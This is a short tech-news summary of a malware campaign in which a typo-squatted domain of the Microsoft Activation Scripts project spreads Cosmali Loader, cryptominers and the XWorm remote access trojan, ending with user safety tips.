Fake MAS Windows Activation Domain Spreads PowerShell Malware - News Directory 3

Fake MAS Windows Activation Domain Spreads PowerShell Malware

December 25, 2025 Lisa Park Tech
News Context
At a glance
  • This article details a recent malware campaign targeting users ​of the Microsoft Activation Scripts (MAS) project, an open-source⁣ tool for activating⁤ Windows and Office.
  • * The Scam: ⁢Attackers are exploiting a typo in the official MAS activation instructions.
  • In short, users of the MAS project are being⁣ targeted​ by a sophisticated phishing campaign that leverages ‌a simple typo to deliver malware.
Original source: bleepingcomputer.com

Summary⁢ of the Cosmali Loader Malware Campaign

This article details a recent malware campaign targeting users ​of the Microsoft Activation Scripts (MAS) project, an open-source⁣ tool for activating⁤ Windows and Office. Here’s a breakdown of the key information:

* The Scam: ⁢Attackers are exploiting a typo in the official MAS activation instructions. Users attempting‌ too ‍activate Windows via PowerShell are being tricked into mistyping “get.activated.win” as “get.activate[.]win”.​ This⁤ leads to infection with the Cosmali Loader malware.
* The‍ Malware: cosmali Loader ⁤delivers cryptomining ⁢utilities and⁢ the XWorm remote access trojan (RAT). Critically, the malware’s control panel is ‌insecure,​ meaning anyone can potentially access infected computers.
* The Warning: ⁢Users ⁤are receiving pop-up warnings claiming thay are infected with Cosmali​ Loader. These warnings advise​ a complete Windows reinstall.
*‌ Origin of Warnings: It’s believed a ⁤security researcher gained access ⁣to the‌ malware’s control panel and ​used it to notify infected users.
* MAS Project: MAS ‍is a legitimate, open-source project hosted⁤ on ‍GitHub, but Microsoft views it unfavorably.
* How it Works: the attackers rely on the small difference between the legitimate⁢ and malicious domain names – a single character – hoping users will make a typo.

In short, users of the MAS project are being⁣ targeted​ by a sophisticated phishing campaign that leverages ‌a simple typo to deliver malware. The recommended solution is a complete Windows reinstall.

Key Takeaways:

* Double-check URLs: Always carefully verify the URLs you are entering, especially when dealing with activation​ or software installation.
* Be wary of pop-up warnings: ⁤While the warnings in this​ case ⁤were legitimate, be cautious about ⁣acting on pop-up messages without verifying their source.
* Understand the risks of unofficial activation tools: Using tools ⁤like MAS, while convenient,‍ carries inherent risks as they are⁤ not officially supported‍ by Microsoft.